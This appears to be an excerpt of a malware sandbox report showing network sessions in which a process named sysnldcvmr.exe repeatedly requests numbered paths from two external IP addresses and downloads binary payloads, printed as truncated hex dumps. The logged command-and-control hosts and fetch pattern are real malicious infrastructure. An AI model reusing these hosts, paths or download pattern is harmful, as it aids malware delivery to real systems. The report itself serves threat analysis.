                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  29192.168.2.115003591.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:56.878448009 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:58.211829901 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  30192.168.2.115003691.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:00.588324070 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:01.913131952 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:01 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  31192.168.2.115003891.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:04.533500910 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:05.859986067 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:05 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  32192.168.2.115004191.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:08.755938053 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:10.077678919 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:09 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  33192.168.2.1150043185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:14.207685947 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.521878004 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:15 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 9472
                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674f01b0-2500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: Eqn7n*%v u&PUK:PXwj>?hr"BH+<_i@Ft(*sIe0al.BM_$"o6*65&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O*0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b|HyW9>Sgx%2S\4`zG
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.521895885 CET124INData Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81
                                                                                                                                                                                                                                                  Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw|1r
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.524365902 CET1236INData Raw: a4 24 91 bc b1 db 4b dd 2f 2e 0a 15 f6 c5 76 91 95 d9 c2 24 e8 c1 a1 24 33 78 ce da c4 6a 9a 37 c2 47 a9 49 1f 18 c0 90 38 77 03 41 3e 24 f9 f8 aa 36 d3 9d 0d ff c2 f1 93 8a c7 96 ae 86 a0 4e f2 46 6a f5 68 32 6d e0 f3 5b f3 ba db cb 0e cc 3d 0b
                                                                                                                                                                                                                                                  Data Ascii: $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[A9\'xZLU'0O]f.SHzv_JnUC6C-!-H;DF6($enNQ>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.524439096 CET1236INData Raw: 60 33 e4 57 f1 78 d1 30 0a 9b 62 2f 1d 1c 08 c3 a5 22 2e d1 34 87 16 2a 41 c9 4d ee 9b 30 49 1e e8 6a 53 83 23 cc 9c 17 d8 4f f9 27 31 01 56 11 23 a0 23 2b 2e 6a 74 1f 74 73 cb 11 cb c1 2a 0d ec 1a 0e ee 73 8d 1b 70 ac 87 f3 fc 34 46 db 9b d7 c1
                                                                                                                                                                                                                                                  Data Ascii: `3Wx0b/".4*AM0IjS#O'1V##+.jtts*sp4F9a0{W{+mF9_X#9`<`811MEECM_bOj2jvv;))z46WF7zcMOYmHJc)6m&%Z'|:.o85>$
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.524451017 CET248INData Raw: 10 68 68 88 46 46 6a 78 92 f2 b3 b1 36 e2 3e 60 62 7a b3 1b 8f dd 2b 47 f6 62 06 5f f8 6b dd 8a e1 9d 1a 3a 94 1f 1d ec 45 e3 a2 65 57 a4 05 98 f3 53 49 46 b8 0a 9c 2b d0 1c f8 6e ae b5 e5 cd f6 38 6c 2d 22 6b 9c 11 7a a2 2e d5 54 6f 28 f2 29 3e
                                                                                                                                                                                                                                                  Data Ascii: hhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\epgWKc@erY7>(f5a@`/2Bv(M}J^!P8XG+oP,8Jp$U%-I<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.525619984 CET1236INData Raw: 01 5e 1e 42 70 f5 61 73 f1 0c 3e fb ed 02 70 e3 f2 8d 7f 63 08 8e 11 34 36 48 68 74 e5 6c fd 21 7b e7 09 bc e5 e6 a4 c2 a6 e9 8a f5 1b 49 0f dc cc 82 ee 89 3a db 91 dc 48 5d c4 98 b8 0a ed b8 9b 4c 28 09 ce cd 2b 86 8b 9d 2d 80 57 c4 60 4b 06 a6
                                                                                                                                                                                                                                                  Data Ascii: ^Bpas>pc46Hhtl!{I:H]L(+-W`KkE_P@%))"=$%<b80{`\3@<U/t-%"[-7(*q.S.e|a_iB>9m2Q|cjC,uMQ&ez; >}V`?`0
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.525677919 CET1236INData Raw: 15 9d fe f4 07 05 d4 1f f0 a0 6c d7 0d 39 91 a5 49 3c 8c eb 10 ca 4d 06 b0 60 1b 8d 58 c7 ab 92 c7 6b 55 73 52 ea 55 db d8 37 96 94 06 5a f4 de d8 41 92 1d 88 57 80 f0 71 ad ce 92 66 d8 88 f2 98 f1 66 20 d4 ab ff c3 3c af a6 a0 83 3e b2 ed b3 a0
                                                                                                                                                                                                                                                  Data Ascii: l9I<M`XkUsRU7ZAWqff <>j+Sh.Psl)cbF{q<Cj?=~,6,$yZ_74QuGS_C|Pn-b'npNv:A+[97]Lg!7[,m["*?{|(|v
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.525688887 CET248INData Raw: 08 27 45 cd 18 52 40 e6 c0 c5 d7 9c b3 55 03 87 49 31 c8 3e f3 3c a4 ce 21 1d b9 07 76 a5 4d fa 01 d5 59 74 0e 97 25 b1 17 6a ae 4d 8d a3 26 b7 54 27 30 df 79 e7 77 51 ef 0e e9 db db 06 62 c7 b9 15 b1 b4 6a 0c a6 e2 c5 1e 41 70 6d 8c 37 64 c6 eb
                                                                                                                                                                                                                                                  Data Ascii: 'ER@UI1><!vMYt%jM&T'0ywQbjApm7d`YA8dFIy{7{,wdFQg7TRorwfw`[q/LC]CmBqbWvI}DNAW[f*cSqZ_hMt1JA:
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.527177095 CET1236INData Raw: c3 40 7a 9b 27 88 a7 3d f3 4f 76 4f 9d 81 2a b8 bb 78 1e 60 55 87 2d 9c f4 43 a7 94 ea a1 c2 c9 2f b8 1a 96 e8 d8 3d 74 c2 4d 2c e7 ed 9f 87 5a 87 18 a2 55 92 88 6d 32 bc 9e ca 3d fc 86 bc 95 a6 19 f7 67 2c bc a2 27 0b 4e da 6e 9e 27 b8 1d 15 29
                                                                                                                                                                                                                                                  Data Ascii: @z'=OvO*x`U-C/=tM,ZUm2=g,'Nn')/C]jmO2qPy,v5yQiQl[x;l@>ULb@7pi.Rxju}Kw(|JC79dh<>}+4mXHBhQ%
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.527275085 CET1236INData Raw: 54 04 7d 2a c5 e8 7a 84 17 11 2f 10 d3 cc a0 28 56 de b0 1d 7f e5 62 6e 42 76 ba fa 46 3e c1 2e 67 c3 68 cb 43 43 dc 04 be e4 87 e3 86 cd bd 5c c0 ef 84 63 ee 86 09 76 95 ee 98 48 cd 8c 37 bd fc 9e 5b 38 2d 26 09 9e 8d 78 09 76 22 65 39 fd 91 cb
                                                                                                                                                                                                                                                  Data Ascii: T}*z/(VbnBvF>.ghCC\cvH7[8-&xv"e9c2M7|t5s<VUnMi.~_'L@"(?rTb2Ha1&w<+nlm4\h>6?lP~'3O|DHHojCa->'XcEgPf
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:15.641702890 CET248INData Raw: e9 c3 ae 8e 6a d3 fc a6 86 82 41 8a fc 7e 31 e7 3c 59 3d 6a f3 b0 5d 45 4a 20 05 88 25 a9 6c a6 3e 02 3f 36 e5 aa 27 5e 1e 60 ea aa 20 34 96 cf 5b a1 27 b2 53 54 c3 14 79 01 c2 90 6f 30 32 3f 9e 49 33 5c 7b 23 41 b9 9a 64 6a 3b af 26 be 56 e8 63
                                                                                                                                                                                                                                                  Data Ascii: jA~1<Y=j]EJ %l>?6'^` 4['STyo02?I3\{#Adj;&Vcrt^DiTWrG3qw}CG?aDSWl)mG[evIxBZQWW0pvuf~Q[UZk";g6wjI'i[+`0.q:I$Dy_


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  34192.168.2.1150045185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:18.046305895 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.357336998 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:34:19 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 10496
                                                                                                                                                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67154d18-2900"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.357352018 CET124INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.357800961 CET1236INData Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35
                                                                                                                                                                                                                                                  Data Ascii: *B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u_pi!
                                                                                                                                                                                                                                                  Dec 5, 2024 17:34:19.357846022 CET1236INData Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65
                                                                                                                                                                                                                                                  Data Ascii: Ku"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
